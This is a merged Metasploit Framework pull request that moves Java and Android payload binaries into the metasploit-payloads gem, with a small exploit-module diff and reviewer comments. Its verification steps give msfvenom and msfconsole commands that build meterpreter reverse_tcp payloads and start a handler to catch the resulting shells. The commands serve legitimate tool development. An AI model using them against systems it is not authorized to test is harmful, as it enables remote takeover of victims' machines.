### PR TITLE
Replace embedded java/android binaries with ones from metasploit-payloads

### PR DESCRIPTION
**Pull request by bcook-r7**
This PR switches the embedded java .class and .jar files to be pulled from the metasploit-payloads gem rather than embedded directly in the metasploit-framework tree.

If a developer copies the underlying files back into the tree, they will still be used in preference to the ones from the gem, simplifying development. Thus, running 'make install' from the metasploit-payloads repository, or running the mvn deploy command directly will override the gem's binaries.
# Verification steps
- [x] msfvenom can still generate a valid java meterpreter payload:
  ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.1 -o java.jar
- [x] java payload stages and runs properly
  ./msfconsole -qx 'use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 192.168.56.1; run'
- [x] msfvenom can still generate a valid android meterpreter payload:
  ./msfvenom -p android/meterpreter/reverse_tcp -o android.apk
- [x] exploits/multi/misc/java_rmi_server runs without any errors (this works OOTB against metasploitable)

I haven't tried java_jmx_server / multi/http/axis2_deployer.rb locally yet, but I'm pretty sure they're correct since rmi_server is (they're all the same).

### CODE REVIEW

**Comment by bcook-r7** [comment]
I'll fixup the spec failure here.

File: modules/exploits/multi/http/axis2_deployer.rb [hunk 1]
```diff
@@ -98,7 +98,7 @@ def upload_exec(session,rpath)
 
       # We need this class as a wrapper to run in a thread.  For some reason
       # the Payload class is giving illegal access exceptions without it.
-      path = File.join(Msf::Config.data_directory, "java", "metasploit", "PayloadServlet.class")
+      path = MetasploitPayloads.path("java", "metasploit", "PayloadServlet.class")
```
Comment (wvu-r7) [inline modules/exploits/multi/http/axis2_deployer.rb]: Can you use ```read``` here instead?

Comment (bcook-r7) [inline modules/exploits/multi/http/axis2_deployer.rb]: yes, will fix, thanks.

**Comment by busterb** [comment]
Anything more needed here?

**Comment by wvu-r7** [comment]
Nope, just doing some additional testing before merging. :)

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/2f2169af908193172c06e0f31fa60f48fa49f2ca

**Comment by busterb** [comment]
I appreciate the extra eyes!

**Pull request merged**